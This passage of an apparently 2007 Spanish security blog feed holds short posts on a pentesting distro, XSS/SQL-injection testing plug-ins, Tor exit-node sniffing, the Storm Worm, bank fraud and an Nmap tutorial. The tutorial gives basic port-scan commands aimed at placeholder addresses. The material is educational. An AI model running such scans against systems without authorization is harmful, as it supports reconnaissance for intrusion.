src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-7765905275191746176</id><published>2007-11-28T10:56:00.001+01:00</published><updated>2007-11-28T11:20:03.170+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Distribuciones Linux'/><title type='text'>nUbuntu</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/R01Ayis8_5I/AAAAAAAAAB8/ae24pymOMP4/s1600-h/logo.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/R01Ayis8_5I/AAAAAAAAAB8/ae24pymOMP4/s320/logo.png" alt="" id="BLOGGER_PHOTO_ID_5137833986952593298" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;nUbunto es una distro, basada como no en Ubuntu, con la peculiridad, de que es un sistema operativo al que se le añaden una serie de &lt;a href="http://www.nubuntu.org/about.php"&gt;herramientas &lt;/a&gt;muy interesantes y al que se le ha desinstalado paquetes innecesarios tales como: Gnome, Openoffice.org, y Evolution.&lt;br /&gt;&lt;br /&gt;La intención de sus creadores era la de utilizar un S.O, "tunneado" que facilite la ardua tarea de los Pen-testers....;)&lt;br /&gt;&lt;br /&gt;Visita obligada a la url de &lt;a href="http://www.nubuntu.org/"&gt;nUbuntu&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Para descargarlo pulsa &lt;a href="http://www.nubuntu.org/downloads.php"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Unos &lt;a href="http://www.thecodingstudio.com/opensource/linux/screenshots/index.php?linux_distribution_sm=nUbuntu%206.10"&gt;Screenshots &lt;/a&gt;de la distro?&lt;br /&gt;&lt;br /&gt;Algún comentario???&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-7765905275191746176?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/7765905275191746176/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=7765905275191746176' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7765905275191746176'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/7765905275191746176'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/nubuntu.html' title='nUbuntu'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/R01Ayis8_5I/AAAAAAAAAB8/ae24pymOMP4/s72-c/logo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-5431714278779692471</id><published>2007-11-28T09:55:00.000+01:00</published><updated>2007-11-28T10:04:20.494+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Firefox'/><title type='text'>Nueva versión Firefox 2.0.0.10+ Plug-ins Pen-tester</title><content type='html'>Se ha liberado la nueva versión del navegador Firefox 2.0.0.10 dicha versión corrige &lt;a href="http://www.mozilla.org/projects/security/known-vulnerabilities.html#firefox2.0.0.10"&gt;tres vulnerabilidades&lt;/a&gt; .&lt;br /&gt;&lt;br /&gt;Yo que tú, actualizaba...para descargarlo pulsa &lt;a href="http://www.mozilla.com/en-US/firefox/all.html"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Y si de paso quieres un par de plug-in para Firefox, te comentaré que en esta &lt;a href="http://www.securitycompass.com/exploitme.shtml"&gt;url &lt;/a&gt;tienes dos y que vienen de maravilla para cualquier pen-tester.Los dos plug-in son para realizar &lt;span style="font-weight: bold;"&gt;XSS y SqlInjection&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Una vez descargardos, instalarlos en el navegador, reiniciarlo y vereís vereís....&lt;br /&gt;&lt;br /&gt;Para cualquier duda, visitar las &lt;a href="http://www.securitycompass.com/exploit_me/xssme_faq.shtml"&gt;FAQ &lt;/a&gt;en la misma URL.&lt;br /&gt;&lt;br /&gt;Que os parece? interesantes plug-ins....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-5431714278779692471?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/5431714278779692471/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=5431714278779692471' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5431714278779692471'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/5431714278779692471'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/nueva-versin-firefox-20010.html' title='Nueva versión Firefox 2.0.0.10+ Plug-ins Pen-tester'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2779372189069842445</id><published>2007-11-23T12:27:00.000+01:00</published><updated>2007-11-25T12:39:36.879+01:00</updated><title type='text'>Detención del "Hacker del año"</title><content type='html'>Ha sido detenido el consultor de seguridad sueco &lt;strong&gt;Dan Egerstad&lt;/strong&gt; que este verano &lt;a href="http://www.kriptopolis.org/listado-passwords-embajadas"&gt;reveló datos sensibles&lt;/a&gt; de numerosas embajadas que utilizaban la red &lt;a href="http://www.torproject.org/index.html.es"&gt;TOR &lt;/a&gt;para asegurar su anonimato....&lt;br /&gt;&lt;br /&gt;Le encontraron con 8 PS2 en su apartamento, y le han acusado de robo, entre las acusaciones que recibirá claro....jode que vicio tenía el colega con la PS2....&lt;br /&gt;&lt;br /&gt;La noticia la tenéis &lt;a href="http://www.kriptopolis.org/arrestado-hacker-sueco"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;El tipo de ataque que realizó, era muy básico a la vez de ingenioso, la red TOR ayuda a obtener anonimato, pero no cifra las conexiones con lo que si os echais un vistazo a como funciona la red TOR seguro que se os hubiese ocurrido algo similar como colaborar con un nodo más en la red TOR y ponerse a escuchar conexiones...ñam ñam....&lt;br /&gt;&lt;br /&gt;Para ver la noticia pincha &lt;a href="http://www.theregister.co.uk/2007/08/31/embassy_email_accounts_exposed/"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Si hubiese publicado de otra manera su investigación, seguramente hubiese tenido menos problemas de los que va a tener, aunque hoy en día cualquier aviso de una vulnerabilidad tiene su precio...no creeis?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2779372189069842445?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2779372189069842445/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2779372189069842445' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2779372189069842445'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2779372189069842445'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/detencin-del-hacker-del-ao.html' title='Detención del &quot;Hacker del año&quot;'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2595748856702133937</id><published>2007-11-23T10:12:00.000+01:00</published><updated>2007-11-23T10:23:24.619+01:00</updated><title type='text'>Nuevo número de INSEGURE MAGAZINE</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_x7dE_ssr2K8/R0abeis8_3I/AAAAAAAAABs/wqO4F0gcMng/s1600-h/issue-main-14.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp2.blogger.com/_x7dE_ssr2K8/R0abeis8_3I/AAAAAAAAABs/wqO4F0gcMng/s200/issue-main-14.jpg" alt="" id="BLOGGER_PHOTO_ID_5135963374076362610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Insegure Magazine ha publicado su número nuevo 14 esta revista es de contenido totalmente gratuito y se publica cada 3 meses (si no me equivoco...)&lt;br /&gt;&lt;br /&gt;Los contenidos de este mes son:&lt;br /&gt;&lt;br /&gt;&lt;ul&gt;&lt;li class="style2"&gt;Attacking consumer embedded devices  &lt;/li&gt;&lt;li class="style2"&gt;Review: QualysGuard  &lt;/li&gt;&lt;li class="style2"&gt;CCTV: technology in transition - analog or IP?  &lt;/li&gt;&lt;li class="style2"&gt;Interview with Robert "RSnake" Hansen, CEO of SecTheory  &lt;/li&gt;&lt;li class="style2"&gt;The future of encryption  &lt;/li&gt;&lt;li class="style2"&gt;Endpoint threats  &lt;/li&gt;&lt;li class="style2"&gt;Review: Kaspersky Internet Security 7.0  &lt;/li&gt;&lt;li class="style2"&gt;Interview with Amol Sarwate, Manager, Vulnerability Research  Lab, Qualys Inc.  &lt;/li&gt;&lt;li class="style2"&gt;Network access control: bridging the network security gap  &lt;/li&gt;&lt;li class="style2"&gt;Change and configuration solutions aid PCI auditors  &lt;/li&gt;&lt;li class="style2"&gt;Data protection and identity management  &lt;/li&gt;&lt;li class="style2"&gt;Information security governance: the nuts and bolts  &lt;/li&gt;&lt;li class="style2"&gt;Securing moving targets  &lt;/li&gt;&lt;li class="style2"&gt;6 CTOs, 10 Burning Questions: AirDefense, AirMagnet, Aruba  Networks, AirTight Networks, Fortress Technologies and Trapeze Networks &lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;br /&gt;Url de la revista &lt;a href="http://www.net-security.org/insecuremag.php"&gt;aquí&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Para descargar la revista en formato .pdf &lt;a href="http://www.net-security.org/dl/insecure/INSECURE-Mag-14.pdf"&gt;aquí&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2595748856702133937?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2595748856702133937/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2595748856702133937' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2595748856702133937'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2595748856702133937'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/nuevo-nmero-de-insegure-magazine.html' title='Nuevo número de INSEGURE MAGAZINE'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp2.blogger.com/_x7dE_ssr2K8/R0abeis8_3I/AAAAAAAAABs/wqO4F0gcMng/s72-c/issue-main-14.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4097379462082161591</id><published>2007-11-23T09:28:00.000+01:00</published><updated>2007-11-23T09:52:56.454+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Apache'/><title type='text'>Mod´s de validación para  Apache</title><content type='html'>Buenos días....&lt;br /&gt;&lt;br /&gt;He encontrado una entrada interesante en el blog de &lt;a href="http://www.sahw.com/wp/"&gt;Sergio Hernando&lt;/a&gt; que nos cuenta los diferentes métodos que nos ofrece Apache para validación....&lt;br /&gt;&lt;br /&gt;Os he colocado los que me parecen más interesantes:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;a href="http://mion.elka.pw.edu.pl/%7Elantonia/php/mod_auth_MAC.php"&gt;mod_auth_MAC&lt;/a&gt; Autenticación basada en MAC...cuidado con los posibles ARP Poison...;)&lt;/li&gt;&lt;li&gt;&lt;a href="http://freshmeat.net/projects/maopenpgp"&gt;mod_auth_openpgp&lt;/a&gt; Autenticación basada en cifrado simétrico...clave pública.&lt;/li&gt;&lt;li&gt;&lt;a href="http://httpd.apache.org/docs/2.0/mod/mod_auth_ldap.html"&gt;mod_auth_ldap &lt;/a&gt;Autenticación basada en LDAP.&lt;/li&gt;&lt;li&gt;&lt;a href="http://httpd.apache.org/docs/2.0/mod/mod_auth_digest.html"&gt;mod_authn_digest&lt;/a&gt; Autenticación basada MD5&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.freeradius.org/mod_auth_radius/"&gt;mod_auth_radius&lt;/a&gt; Autenticación por RADIUS&lt;/li&gt;&lt;li&gt;&lt;a href="http://mod-auth-shadow.sourceforge.net/"&gt;mod_auth_shadow&lt;/a&gt; Autenticación basada en /etc/passwd o similares, de sistemas Nix*&lt;/li&gt;&lt;/ul&gt;Ahora solo falta que algún íntrepido Admin, le pique el gusanillo de la seguridad y con permiso de su todopoderoso jefe le de la "gracia" (que no es poco) de implementar estos mod para apache..&lt;br /&gt;&lt;br /&gt;Comentarios?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4097379462082161591?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4097379462082161591/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4097379462082161591' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4097379462082161591'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4097379462082161591'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/mods-de-validacin-para-apache.html' title='Mod´s de validación para  Apache'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-2539429813822268023</id><published>2007-11-21T21:06:00.001+01:00</published><updated>2007-11-21T21:07:50.777+01:00</updated><title type='text'>Actualización YA</title><content type='html'>Hola a todos en breve actualizaré el blog con nuevos contenidos...&lt;br /&gt;&lt;br /&gt;Seguiré dando caña ;)&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-2539429813822268023?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/2539429813822268023/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=2539429813822268023' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2539429813822268023'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/2539429813822268023'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/actualizacin-ya.html' title='Actualización YA'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-4158982588879995510</id><published>2007-11-04T09:12:00.000+01:00</published><updated>2007-11-04T10:26:14.225+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Nmap'/><title type='text'>Nmap II</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_x7dE_ssr2K8/Ry2OjSNVMiI/AAAAAAAAABk/DqKtviGVrrI/s1600-h/300px-Tcp-handshake.png"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_x7dE_ssr2K8/Ry2OjSNVMiI/AAAAAAAAABk/DqKtviGVrrI/s200/300px-Tcp-handshake.png" alt="" id="BLOGGER_PHOTO_ID_5128912287479181858" border="0" /&gt;&lt;/a&gt;Seguimos con los comandos básicos para aprender como funciona nmap&lt;br /&gt;&lt;br /&gt;Existen distintos tipo de scanneo como nos indica la herramienta....&lt;br /&gt;&lt;br /&gt;SCAN TECHNIQUES:&lt;br /&gt;-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans&lt;br /&gt;-sU: UDP Scan&lt;br /&gt;-sN/sF/sX: TCP Null, FIN, and Xmas scans&lt;br /&gt;--scanflags &lt;flags&gt;: Customize TCP scan flags&lt;br /&gt;&lt;br /&gt;Se pueden lanzar diferentes tipos de conexión -sS (SYN) -sA (ACK) -sF (FIN)&lt;br /&gt;Con lo que una sintaxis del scanneo de un host sería:&lt;br /&gt;&lt;br /&gt;nmap -sS xxx.xxx.xxx.xxx&lt;br /&gt;&lt;br /&gt;Según utilicemos el tipo de conexión para cualquier scanneo obtendremos una respuesta u otra ;)&lt;br /&gt;&lt;br /&gt;Como bien sabemos los firewalls, una de las primeras cosas que suelen hacer es descriminar el tráfico ICMP por las consecuencias que pudiese tener...&lt;br /&gt;&lt;br /&gt;&lt;/flags&gt;nmap -sS xxx.xxx.xxx.xxx -P0 en nmap no emitir tráfico ICMP se hace con la opción -P0 ;)&lt;br /&gt;&lt;br /&gt;Como dice la herramienta podemos, especificar el rango de puertos a utilizar...&lt;br /&gt;&lt;br /&gt;PORT SPECIFICATION AND SCAN ORDER:&lt;br /&gt; -p &lt;port&gt;: Only scan specified ports&lt;br /&gt;   Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080&lt;br /&gt; -F: Fast - Scan only the ports listed in the nmap-services file)&lt;br /&gt; -r: Scan ports consecutively - don't randomize&lt;br /&gt;&lt;br /&gt;Un ejemplo para scannear un servidor web sería....&lt;br /&gt;&lt;br /&gt;nmap -sS xxx.xxx.xxx.xxx -P0 p80&lt;br /&gt;&lt;br /&gt;Con estos primeros pasos, ya se pueden hacer pruebasde ver como responde la herramienta, más adelante explicaré más funcionalidades e interpretación de resultados....&lt;br /&gt;&lt;br /&gt;Saludos domingueros!!!&lt;br /&gt;&lt;flags&gt;&lt;br /&gt;&lt;/flags&gt;&lt;/port&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-4158982588879995510?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/4158982588879995510/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=4158982588879995510' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4158982588879995510'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/4158982588879995510'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/nmap-ii.html' title='Nmap II'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://bp1.blogger.com/_x7dE_ssr2K8/Ry2OjSNVMiI/AAAAAAAAABk/DqKtviGVrrI/s72-c/300px-Tcp-handshake.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-194931095411623860</id><published>2007-11-02T09:35:00.000+01:00</published><updated>2007-11-02T09:45:33.330+01:00</updated><title type='text'>Educación Vs Capacidad</title><content type='html'>Esta mañana he leido en un periodico un interesante artículo, con el que me he sentido identificado, en dicho artículo se habla de como un chaval, de 16 años, es capaz de dar soporte avanzado y "pegarse" desde hace 5 años con su distro de Linux, y a la vez ser un mal estudiante.&lt;br /&gt;&lt;br /&gt;Como se puede tener tanta capacidad intelectual como para con 11 años empezar a trabajar bajo Linux y después de 5 años con 16 tener un nivel superior a la media, en informática y ser mal estudiante....aquí algo no me cuadra...&lt;br /&gt;&lt;br /&gt;Está claro que nuestro sistema educativo está creado por cafres y no solo por este claro ejemplo, ya que no hace falta ser un hacha en informática con 16 años, para ver que nuestro sistema educativo no termina de triunfar, pero no ahora, sino desde hace unos añitos...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.elpais.com/articulo/red/Cates/cole/matriculas/Linux/elpeputec/20071101elpcibenr_5/Tes"&gt;Aqui &lt;/a&gt;queda la noticia&lt;br /&gt;&lt;br /&gt;Si te sientes identificado/a deja algún comentario....&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-194931095411623860?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/194931095411623860/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=194931095411623860' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/194931095411623860'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/194931095411623860'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/11/educacin-vs-capacidad.html' title='Educación Vs Capacidad'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1594612713832220324</id><published>2007-10-31T16:25:00.000+01:00</published><updated>2007-11-02T09:48:35.273+01:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>Virus On the Wild: Storm Worm</title><content type='html'>&lt;a href="http://es.wikipedia.org/wiki/Halloween"&gt;Esta noche&lt;/a&gt;, es una de esas noches de las que tenemos al año, muy propensas para ir en el subject de cualquier correo electrónico, con no muy buenas intenciones.... ;)&lt;br /&gt;&lt;br /&gt;De los virus que nos "acechan" hoy en día, una gran cantidad  están orientados al robo de credenciales bancarios, mientras que hay otro tipo de virus, los menos, los llamados "románticos" los cuales persiguen otra finalidad muy diferente que la obtención de credenciales y posterior "cyber-atraco".&lt;br /&gt;&lt;br /&gt;Uno de estos virus de difinición "romántica" está apareciendo como uno de los que posee una tasa de infección muy alta, el virus al que me refiero es Storm Worm. Dicho virus está siendo detectado con un subject en muchos de los correos adjuntos en los que va, utilizando la cobertura que da una noche como la de &lt;a href="http://es.wikipedia.org/wiki/Halloween"&gt;hoy&lt;/a&gt;, utilizando ingeniería social, a la vieja usanza vamos....&lt;br /&gt;&lt;br /&gt;Información sobre el virus:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.websense.com/securitylabs/alerts/alert.php?AlertID=814"&gt;Websense &lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://honeyblog.org/archives/140-Trick-or-Treat-Storms-Halloween.html"&gt;Honeyblog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://blog.s21sec.com/2007/10/storm-revisited.html"&gt;S21secBlog&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Que tiempos aquellos los de &lt;a href="http://www.29a.net/"&gt;29a !!!!&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Asi que ojo al parche, con el bichito, porque dará curro extra a algún Admin de seguridad que conozco...!!! y a pasarlo bien, sin que os den muchos sustos....&lt;br /&gt;&lt;br /&gt;Un abrazo grande para los "bichos" que estan evitando las infecciones del día a día...Perico, Jorghino,David....gracias por lo que me enseñasteis...especímenes mios!!&lt;br /&gt;&lt;br /&gt;Cambio y corto!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1594612713832220324?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://cronicasdesid.blogspot.com/feeds/1594612713832220324/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1821337150970789352&amp;postID=1594612713832220324' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1594612713832220324'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1821337150970789352/posts/default/1594612713832220324'/><link rel='alternate' type='text/html' href='http://cronicasdesid.blogspot.com/2007/10/virus-on-wild-storm-worm.html' title='Virus On the Wild: Storm Worm'/><author><name>StArScReAm</name><uri>http://www.blogger.com/profile/04029801669133895362</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1821337150970789352.post-1106027835951029518</id><published>2007-10-31T12:37:00.000+01:00</published><updated>2007-10-31T13:11:33.718+01:00</updated><title type='text'>Manos arriba!! esto es un atraco...on-line</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_x7dE_ssr2K8/Ryhw6SNVMhI/AAAAAAAAABc/1fYMmlU1u2I/s1600-h/ladron.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_x7dE_ssr2K8/Ryhw6SNVMhI/AAAAAAAAABc/1fYMmlU1u2I/s200/ladron.jpg" alt="" id="BLOGGER_PHOTO_ID_5127472322383786514" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="content"&gt;&lt;p&gt;Por un lado tenemos a....los bancos&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Por mucho que nuestros bancos se empeñen en afirmar lo contrario, las gestiones que realizamos a través de la la banca electrónica no son seguras y les aplican riesgos, que no están en el lado del cliente de manera exclusiva...&lt;/p&gt;&lt;p&gt;Como se comenta en esta &lt;a href="http://www.elpais.com/articulo/internet/anos/carcel/atracar/120000/euros/cuentas/bancarias/electronicas/elpeputec/20071030elpepunet_7/Tes"&gt;noticia&lt;/a&gt;&lt;/p&gt;&lt;p&gt;No sería mejor el dejar de echar la culpa solo a los usuarios y asumir las deficiencias propias en la seguridad?.Pero claro cuando se trata de asumir pérdidas mejor echar la culpa al usuario....y su formación en seguridad.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Y por otro lado....a los que se pasan de listos!&lt;/p&gt;&lt;p&gt;También están los que mediante el timo de la estampita, (&lt;a href="http://es.wikipedia.org/wiki/Phishing"&gt;phising&lt;/a&gt;) nos atracan on line, como dice esta &lt;a href="http://www.diariocordoba.com/noticias/noticia.asp?pkid=359603"&gt;noticia&lt;/a&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p&gt;Y la pregunta que me hago es...y todo este tipo de "atracos on-line" es la punta del iceberg? de cuantos casos no tenemos constancia con una solución para los afectados?&lt;/p&gt;&lt;p&gt;Bueno, menos mal, que nuestra seguridad ciudadana hace este tipo de &lt;a href="http://www.cnpts.es/"&gt;eventos&lt;/a&gt;....les servirá de algo?....&lt;br /&gt;&lt;/p&gt;&lt;p&gt;En fin......&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1821337150970789352-1106027835951029518?l=cronicasdesid.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' 